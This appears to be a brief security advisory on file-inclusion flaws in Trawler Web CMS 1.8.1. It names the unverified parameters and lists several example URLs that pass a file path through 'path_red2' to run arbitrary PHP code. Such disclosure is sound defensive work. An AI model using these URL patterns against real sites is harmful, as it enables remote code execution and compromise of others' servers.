Description: k1tk4t has reported some vulnerabilities in Trawler Web CMS, which can be exploited by malicious people to compromise a vulnerable system.
Input passed to the "path_scr_dat2" in _msdazu_share/share/insert1.php, to the "path_red" parameter in _msdazu_share/extras/downloads/index.php, and to the "path_red2" parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.
Examples:
http://[host]/_msdazu_pdata/redaktion/artikel/up/index.php?path_red2=[file]
http://[host]/_msdazu_share/richtext/addtort.php?path_red2=[file]
http://[host]/_msdazu_share/richtext/colorpik2.php?path_red2=[file]
http://[host]/_msdazu_share/richtext/colorpik3.php?path_red2=[file]
http://[host]/_msdazu_share/richtext/extras_menu.php?path_red2=[file]
http://[host]/_msdazu_share/richtext/farbpalette.php?path_red2=[file]
http://[host]/_msdazu_share/richtext/lese_inc.php?path_red2=[file]
http://[host]/_msdazu_share/richtext/newfile.php?path_red2=[file]
Note: Reportedly more files and parameters are affected.
Successful exploitation requires that "register_globals" is enabled.
The vulnerabilities are reported in version 1.8.1. Other versions may also be affected.
